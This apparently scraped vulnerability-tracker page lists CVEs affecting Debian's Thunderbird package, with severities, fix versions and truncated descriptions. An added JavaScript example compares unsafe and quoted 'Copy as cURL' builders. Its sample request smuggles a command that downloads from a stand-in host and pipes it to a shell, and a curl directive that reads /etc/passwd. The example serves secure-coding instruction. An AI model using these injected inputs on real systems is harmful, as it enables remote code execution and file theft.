Debian Thunderbird vulnerabilities
931 known vulnerabilities affecting debian/thunderbird.
Total CVEs: 931
CISA KEV (actively exploited): 10
Public exploits: 18
Exploited in wild: 13
Severity breakdown: CRITICAL 166, HIGH 358, MEDIUM 317, LOW 90
Vulnerabilities
Page 35 of 47
CVE-2020-16012 | MEDIUM | CVSS 4.3 | chromium | fixed in chromium 87.0.4280.88-0.1 (bookworm) | 2020
Side-channel information leakage in graphics in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to leak cross-origin data via a crafted HTML page.
Scope: local
bookworm: resolved (fixed in 87.0.4280.88-0.1)
bullseye: resolved (fixed in 87.0.4280.88-0.1)
forky: resolved (fixed in 87.0.4280.88-0.1)
sid: resolved (fixed in 87.0.4280.88-0.1)
trixie: res
CVE-2020-12392 | MEDIUM | CVSS 5.5 | firefox | fixed in firefox 76.0-1 (sid) | 2020
The 'Copy as cURL' feature of Devtools' network tab did not properly escape the HTTP POST data of a request, which can be controlled by the website. If a user used the 'Copy as cURL' feature and pasted the command into a terminal, it could have resulted in the disclosure of local files. This vulnerability affects Firefox ESR < 68.8, Firefox < 76, and Thunderbird <
CVE-2020-26956 | MEDIUM | CVSS 6.1 | firefox | fixed in firefox 83.0-1 (sid) | 2020
In some cases, removing HTML elements during sanitization would keep existing SVG event handlers and therefore lead to XSS. This vulnerability affects Firefox < 83, Firefox ESR < 78.5, and Thunderbird < 78.5.
Scope: local
sid: resolved (fixed in 83.0-1)
CVE-2020-12418 | MEDIUM | CVSS 6.5 | firefox | fixed in firefox 78.0-1 (sid) | 2020
Manipulating individual parts of a URL object could have caused an out-of-bounds read, leaking process memory to malicious JavaScript. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0.
Scope: local
sid: resolved (fixed in 78.0-1)
CVE-2020-6812 | MEDIUM | CVSS 5.3 | firefox | fixed in firefox 74.0-1 (sid) | 2020
The first time AirPods are connected to an iPhone, they are named after the user's name by default (e.g. "Jane Doe's AirPods"). Websites with camera or microphone permission are able to enumerate device names, disclosing the user's name. To resolve this issue, Firefox added a special case that renames devices containing the substring 'AirPods' to simply 'AirPods'.
CVE-2020-15664 | MEDIUM | CVSS 6.5 | firefox | fixed in firefox 80.0-1 (sid) | 2020
By holding a reference to the eval() function from an about:blank window, a malicious webpage could have gained access to the InstallTrigger object which would allow them to prompt the user to install an extension. Combined with user confusion, this could result in an unintended or malicious extension being installed. This vulnerability affects Firefox < 80, Thund
CVE-2020-6514 | MEDIUM | CVSS 6.5 | chromium | fixed in chromium 87.0.4280.88-0.1 (bookworm) | 2020
Inappropriate implementation in WebRTC in Google Chrome prior to 84.0.4147.89 allowed an attacker in a privileged network position to potentially exploit heap corruption via a crafted SCTP stream.
Scope: local
bookworm: resolved (fixed in 87.0.4280.88-0.1)
bullseye: resolved (fixed in 87.0.4280.88-0.1)
forky: resolved (fixed in 87.0.4280.88-0.1)
sid: resolved (fixe
CVE-2020-26978 | MEDIUM | CVSS 6.1 | firefox | fixed in firefox 84.0-1 (sid) | 2020
Using techniques that built on the slipstream research, a malicious webpage could have exposed both an internal network's hosts as well as services running on the user's local machine. This vulnerability affects Firefox < 84, Thunderbird < 78.6, and Firefox ESR < 78.6.
Scope: local
sid: resolved (fixed in 84.0-1)
CVE-2020-6793 | MEDIUM | CVSS 6.5 | thunderbird | fixed in thunderbird 1:68.5.0-1 (bookworm) | 2020
When processing an email message with an ill-formed envelope, Thunderbird could read data from a random memory location. This vulnerability affects Thunderbird < 68.5.
Scope: local
bookworm: resolved (fixed in 1:68.5.0-1)
bullseye: resolved (fixed in 1:68.5.0-1)
forky: resolved (fixed in 1:68.5.0-1)
sid: resolved (fixed in 1:68.5.0-1)
trixie: resolved (fixed in
CVE-2020-26953 | MEDIUM | CVSS 4.3 | firefox | fixed in firefox 83.0-1 (sid) | 2020
It was possible to cause the browser to enter fullscreen mode without displaying the security UI; thus making it possible to attempt a phishing attack or otherwise confuse the user. This vulnerability affects Firefox < 83, Firefox ESR < 78.5, and Thunderbird < 78.5.
Scope: local
sid: resolved (fixed in 83.0-1)
CVE-2020-6794 | MEDIUM | CVSS 6.5 | thunderbird | fixed in thunderbird 1:68.5.0-1 (bookworm) | 2020
If a user saved passwords before Thunderbird 60 and then later set a master password, an unencrypted copy of these passwords is still accessible. This is because the older stored password file was not deleted when the data was copied to a new format starting in Thunderbird 60. The new master password is added only on the new file. This could allow the exposure o
CVE-2020-6792 | MEDIUM | CVSS 4.3 | thunderbird | fixed in thunderbird 1:68.5.0-1 (bookworm) | 2020
When deriving an identifier for an email message, uninitialized memory was used in addition to the message contents. This vulnerability affects Thunderbird < 68.5.
Scope: local
bookworm: resolved (fixed in 1:68.5.0-1)
bullseye: resolved (fixed in 1:68.5.0-1)
forky: resolved (fixed in 1:68.5.0-1)
sid: resolved (fixed in 1:68.5.0-1)
trixie: resolved (fixed in 1:68
CVE-2020-16042 | MEDIUM | CVSS 6.5 | chromium | fixed in chromium 87.0.4280.88-0.1 (bookworm) | 2020
Uninitialized Use in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.
Scope: local
bookworm: resolved (fixed in 87.0.4280.88-0.1)
bullseye: resolved (fixed in 87.0.4280.88-0.1)
forky: resolved (fixed in 87.0.4280.88-0.1)
sid: resolved (fixed in 87.0.4280.88
CVE-2020-15658 | MEDIUM | CVSS 6.5 | firefox | fixed in firefox 79.0-1 (sid) | 2020
The code for downloading files did not properly take care of special characters, which led to an attacker being able to cut off the file ending at an earlier position, leading to a different file type being downloaded than shown in the dialog. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1.
Scope: local
sid: resolved (fixed in
CVE-2020-15663 | LOW (title tag: HIGH) | CVSS 8.8 | firefox | 2020
If Firefox is installed to a user-writable directory, the Mozilla Maintenance Service would execute updater.exe from the install location with system privileges. Although the Mozilla Maintenance Service does ensure that updater.exe is signed by Mozilla, the version could have been rolled back to a previous version which would have allowed exploitation of an older bu
CVE-2020-6797 | LOW (title tag: MEDIUM) | CVSS 4.3 | firefox | 2020
By downloading a file with the .fileloc extension, a semi-privileged extension could launch an arbitrary application on the user's computer. The attacker is restricted as they are unable to download non-quarantined files or supply command line arguments to the application, limiting the impact. Note: this issue only occurs on Mac OSX. Other operating systems are unaf
CVE-2020-12393 | LOW (title tag: HIGH) | CVSS 7.8 | firefox | 2020
The 'Copy as cURL' feature of Devtools' network tab did not properly escape the HTTP method of a request, which can be controlled by the website. If a user used the 'Copy as cURL' feature and pasted the command into a terminal, it could have resulted in command injection and arbitrary command execution. *Note: this issue only affects Firefox on Windows operating sys
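CVE-2020-12392 (POST data not escaped, local file disclosure) and CVE-2020-12393 (HTTP method not escaped, command injection) above are the same bug class: site-controlled strings pasted into a shell command line without quoting. The block below is an added example, not Firefox or Thunderbird code, showing a naive "Copy as cURL" builder next to a hardened one for a POSIX shell. The request object, URL and header are constructed. Two facts it relies on: a POSIX single-quoted string can only be ended by a single quote (so `'\''` is the standard way to embed one), and curl's `--data` treats a leading `@` as "read this local file" while `--data-raw` does not. That `@` handling is one route to the local-file disclosure the CVE-2020-12392 text describes; whether it was the exact trigger is an assumption here.

```javascript
// Added example (not Mozilla code): generating a "Copy as cURL" line.
// Every field below (method, URL, headers, body) can be chosen by the
// page being inspected, so each one is attacker-controlled input.

// Quote one argument for a POSIX shell: wrap in single quotes and turn
// every embedded single quote into '\'' (close, escaped quote, reopen).
function shQuote(s) {
  return "'" + String(s).replace(/'/g, "'\\''") + "'";
}

// Naive builder: request parts are concatenated unquoted, and the body
// goes through --data, which interprets a leading "@" as a file path.
function toCurlUnsafe(req) {
  const parts = ["curl", "-X", req.method, req.url];
  for (const [k, v] of Object.entries(req.headers || {})) {
    parts.push("-H", `${k}: ${v}`);
  }
  if (req.body != null) parts.push("--data", req.body);
  return parts.join(" ");
}

// Hardened builder: every site-influenced token is a single quoted
// argument, and the body uses --data-raw so "@" is sent literally.
function toCurlSafe(req) {
  const parts = ["curl", shQuote(req.url), "-X", shQuote(req.method)];
  for (const [k, v] of Object.entries(req.headers || {})) {
    parts.push("-H", shQuote(`${k}: ${v}`));
  }
  if (req.body != null) parts.push("--data-raw", shQuote(req.body));
  return parts.join(" ");
}

// Check used to compare the two: walk the command line tracking
// single-quote state and report whether any shell metacharacter
// (; | & newline ` $ ( ) < >) sits outside quotes. Backslash outside
// quotes escapes the next character, which is how '\'' is parsed.
function hasUnquotedMetachar(cmd) {
  let inQuote = false;
  for (let i = 0; i < cmd.length; i++) {
    const ch = cmd[i];
    if (inQuote) {
      if (ch === "'") inQuote = false;
      continue;
    }
    if (ch === "\\") { i++; continue; }   // skip the escaped character
    if (ch === "'") { inQuote = true; continue; }
    if (";|&\n`$()<>".includes(ch)) return true;
  }
  return false;
}

// Constructed sample: a request whose method and body a hostile page
// controls. The method carries a command injection, the body a curl
// file-read directive; the header carries a stray single quote.
const hostileRequest = {
  method: "GET; curl evil.test/x | sh; #",
  url: "https://example.test/api",
  headers: { "X-Note": "it's" },
  body: "@/etc/passwd",
};

console.log("unsafe:", toCurlUnsafe(hostileRequest));
console.log("safe:  ", toCurlSafe(hostileRequest));
console.log("unsafe has unquoted metachar:", hasUnquotedMetachar(toCurlUnsafe(hostileRequest)));
console.log("safe has unquoted metachar:  ", hasUnquotedMetachar(toCurlSafe(hostileRequest)));
```

The quoting shown is for POSIX shells only. The page notes CVE-2020-12393 affected Firefox on Windows, where a command pasted into cmd.exe is parsed under different rules (single quotes are not quoting characters there), so a Windows-targeted generator needs its own escaping and cannot reuse `shQuote` as written.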
CVE-2020-15657 | LOW (title tag: HIGH) | CVSS 7.8 | firefox | 2020
Firefox could be made to load attacker-supplied DLL files from the installation directory. This required an attacker that is already capable of placing files in the installation directory. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird <
CVE-2020-35112 | LOW (title tag: HIGH) | CVSS 8.8 | firefox | 2020
If a user downloaded a file lacking an extension on Windows, and then "Open"-ed it from the downloads panel, if there was an executable file in the downloads directory with the same name but with an executable extension (such as .bat or .exe) that executable would have been launched instead. *Note: This issue only affected Windows operating systems. Other operating
CVE-2020-26966 | LOW (title tag: MEDIUM) | CVSS 6.5 | firefox | 2020
Searching for a single word from the address bar caused an mDNS request to be sent on the local network searching for a hostname consisting of that string; resulting in an information leak. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Firefox < 83, Firefox ESR < 78.5, and Thunderbir